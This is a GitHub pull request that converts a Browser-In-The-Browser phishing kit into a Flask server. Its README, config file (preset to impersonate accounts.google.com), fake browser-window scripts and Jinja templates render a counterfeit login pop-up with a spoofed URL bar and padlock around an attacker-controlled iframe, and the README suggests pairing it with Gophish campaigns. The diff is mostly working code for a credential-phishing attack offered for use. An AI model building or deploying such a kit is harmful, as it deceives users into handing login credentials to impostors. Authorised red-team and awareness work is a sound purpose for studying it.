Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

feat: flask app for BITB #12

Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
3 changes: 3 additions & 0 deletions .vscode/settings.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
{
"vscode-corda.isCordaProject": false
}
44 changes: 32 additions & 12 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,27 +1,47 @@
# BITB
Browser templates for Browser In The Browser (BITB) attack.
# BITB Server

Flask application for Browser In The Browser (BITB) attack.

It's a Fork of https://github.com/mrd0x/BITB

More information: https://mrd0x.com/browser-in-the-browser-phishing-attack/


# Requirements
pip3 install -r requirements.txt

# Usage

Each folder has a `index.html` file which has 4 variables that must be modified:
phishing.ini file has 4 variables that must be modified:

* **XX-TITLE-XX** - The title that shows up for the page (e.g. Sign in to your account now)
* **XX-DOMAIN-NAME-XX** - Domain name you're masquerading as. (e.g. gmail.com)
* **XX-DOMAIN-PATH-XX** - Domain path (e.g. /auth/google/login)
* **XX-PHISHING-LINK-XX** - Phishing link which will be embedded into the iFrame (e.g. https://example.com)
* **PHISHING_TITLE** - The title that shows up for the page (e.g. Sign in to your account now)
* **DOMAIN_NAME** - Domain name you're masquerading as. (e.g. gmail.com)
* **DOMAIN_PATH** - Domain path (e.g. /auth/google/login)
* **BITB_TEMPLATE** * - Look alike browser template name (e.g. Windows-DarkMode-Delay)

Furthermore, if you're using a Windows template you should update the `logo.svg` which is the icon of the website you're masquerading as. The default logo is Microsoft.
DOMAIN_NAME = https://gmail.com
DOMAIN_PATH = /login
PHISHING_TITLE = Gmail
BITB_TEMPLATE = Windows-DarkMode-Delay

# Run the Flask app

# Windows-DarkMode-Delay
```bash

The Windows-DarkMode-Delay folder makes use of jQuery's fadeIn() function to add a slight delay to the pop-up window as it appears. This is only one way of making the Window appear in a delayed fashion, there's various other ways to do the same.
cd bitb_server
python3 main.py

# Demo
```

![Demo](https://github.com/mrd0x/BITB/blob/main/demo.gif)
Open the browser and go to http://localhost:5000/test and you see a live test page.

Furthermore, if you're using a Windows template you should update the `logo.svg` which is the icon of the website you're masquerading as. The default logo is Microsoft.
# Integration

You can use this with https://getgophish.com/ leverage your campaings
# Windows-DarkMode-Delay

The Windows-DarkMode-Delay folder makes use of jQuery's fadeIn() function to add a slight delay to the pop-up window as it appears. This is only one way of making the Window appear in a delayed fashion, there's various other ways to do the same.

# Detecting Color Preference

Expand Down
37 changes: 0 additions & 37 deletions Windows-Chrome-DarkMode/index.html

This file was deleted.

37 changes: 0 additions & 37 deletions Windows-Chrome-LightMode/index.html

This file was deleted.

38 changes: 0 additions & 38 deletions Windows-DarkMode-Delay/index.html

This file was deleted.

4 changes: 4 additions & 0 deletions bitb_server/app.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,4 @@
from flask import Flask

app = Flask(__name__, static_url_path="/static", static_folder="static")
app.config.from_object("config.DevelopmentConfig")
6 changes: 6 additions & 0 deletions bitb_server/config.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
class Config(object):
DEBUG = False
TESTING = False

class DevelopmentConfig(Config):
DEBUG = True
5 changes: 5 additions & 0 deletions bitb_server/main.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
from app import app
from views import *

if __name__ == "__main__":
app.run()
5 changes: 5 additions & 0 deletions bitb_server/phishing.ini
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
[phishing]
DOMAIN_NAME = https://accounts.google.com
DOMAIN_PATH = /login
PHISHING_TITLE = Gmail
BITB_TEMPLATE = Windows-DarkMode-Delay
1 change: 1 addition & 0 deletions bitb_server/requirements.txt
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
Flask==1.1.1
File renamed without changes.
3 changes: 3 additions & 0 deletions bitb_server/static/common/js/styles.css
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
body {
background-color: black;
}
3 changes: 3 additions & 0 deletions bitb_server/static/css/styles.css
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
body {
background-color: black;
}
File renamed without changes.
60 changes: 60 additions & 0 deletions bitb_server/static/phishing/MacOS-Chrome-DarkMode/script.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,60 @@
var titleBar = document.getElementById("title-bar");
var exit = document.getElementById("exit");
var max = document.getElementById("maximize");
var min = document.getElementById("minimize");

titleBar.addEventListener('mouseover', function handleMouseOver() {
titleBar.style.cursor = 'context-menu';
});

titleBar.addEventListener('mouseout', function handleMouseOver() {
titleBar.style.cursor = 'default';
});

//////////////// Make window draggable start ////////////////
// Make the DIV element draggable:
var draggable = $('#window');
var title = $('#title-bar');

title.on('mousedown', function(e){
var dr = $(draggable).addClass("drag");
height = dr.outerHeight();
width = dr.outerWidth();
ypos = dr.offset().top + height - e.pageY,
xpos = dr.offset().left + width - e.pageX;
$(document.body).on('mousemove', function(e){
var itop = e.pageY + ypos - height;
var ileft = e.pageX + xpos - width;
if(dr.hasClass("drag")){
dr.offset({top: itop,left: ileft});
}
}).on('mouseup', function(e){
dr.removeClass("drag");
});
});
//////////////// Make window draggable end ////////////////


////////////////// Onclick listeners //////////////////
// X button functionality
$("#exit").click(function(){
$("#window").css("display", "none");
});

// Maximize button functionality
$("#maximize").click(enlarge);

function enlarge(){
if(max.classList.contains("enlarged")){
$("#window").css("width", "40%");
$("#title-bar-width").css('width', '100%').css('width', '+=2px');
$("#content").css("width", "100%");
$("#maximize").removeClass("enlarged");
}
else{
$("#window").css("width", "70%");
$("#title-bar-width").css('width', '100%').css('width', '+=2px');
$("#content").css("width", "100%");
$("#maximize").addClass("enlarged");
}
}
60 changes: 60 additions & 0 deletions bitb_server/static/phishing/MacOS-Chrome-LightMode/script.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,60 @@
var titleBar = document.getElementById("title-bar");
var exit = document.getElementById("exit");
var max = document.getElementById("maximize");
var min = document.getElementById("minimize");

titleBar.addEventListener('mouseover', function handleMouseOver() {
titleBar.style.cursor = 'context-menu';
});

titleBar.addEventListener('mouseout', function handleMouseOver() {
titleBar.style.cursor = 'default';
});

//////////////// Make window draggable start ////////////////
// Make the DIV element draggable:
var draggable = $('#window');
var title = $('#title-bar');

title.on('mousedown', function(e){
var dr = $(draggable).addClass("drag");
height = dr.outerHeight();
width = dr.outerWidth();
ypos = dr.offset().top + height - e.pageY,
xpos = dr.offset().left + width - e.pageX;
$(document.body).on('mousemove', function(e){
var itop = e.pageY + ypos - height;
var ileft = e.pageX + xpos - width;
if(dr.hasClass("drag")){
dr.offset({top: itop,left: ileft});
}
}).on('mouseup', function(e){
dr.removeClass("drag");
});
});
//////////////// Make window draggable end ////////////////


////////////////// Onclick listeners //////////////////
// X button functionality
$("#exit").click(function(){
$("#window").css("display", "none");
});

// Maximize button functionality
$("#maximize").click(enlarge);

function enlarge(){
if(max.classList.contains("enlarged")){
$("#window").css("width", "40%");
$("#title-bar-width").css('width', '100%').css('width', '+=2px');
$("#content").css("width", "100%");
$("#maximize").removeClass("enlarged");
}
else{
$("#window").css("width", "70%");
$("#title-bar-width").css('width', '100%').css('width', '+=2px');
$("#content").css("width", "100%");
$("#maximize").addClass("enlarged");
}
}
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
4 changes: 4 additions & 0 deletions bitb_server/static/phishing/Windows-DarkMode-Delay/ssl.svg
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
13 changes: 13 additions & 0 deletions bitb_server/templates/hook/index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,13 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Hook</title>
</head>
<body>
<h1>Hook</h1>
<p>Insert your bait here</p>
</body>
</html>
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="style.css">
<link rel="stylesheet" href="{{ url_for('static', filename='phishing/') }}{{ template_static_dir }}/style.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body>
Expand All @@ -17,18 +17,18 @@
<div id="maximize" class="dot green"></div>
</span>

<span id="logo-description">XX-TITLE-XX</span>
<span id="logo-description">{{ phishing_title }}</span>
</div>
<div id="url-bar">
<img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
<span id="domain-name">XX-DOMAIN-NAME-XX</span>
<span id="domain-path">XX-DOMAIN-PATH-XX</span>
<img src="{{ url_for('static', filename='phishing/') }}{{ template_static_dir }}/ssl.svg" width="20px" height="20px" id="ssl-padlock">
<span id="domain-name">{{ domain_name }}</span>
<span id="domain-path">{{ domain_path }}</span>
</div>
</div>
<!-- Content start -->
<iframe id="content" src="XX-PHISHING-LINK-XX" frameBorder="0"></iframe>
<iframe id="content" src="{{ hook_link }}" frameBorder="0"></iframe>
</div>
</body>
<script src="script.js"></script>
<script src="{{ url_for('static', filename='common/js/script.js') }}"></script>
</html>

Loading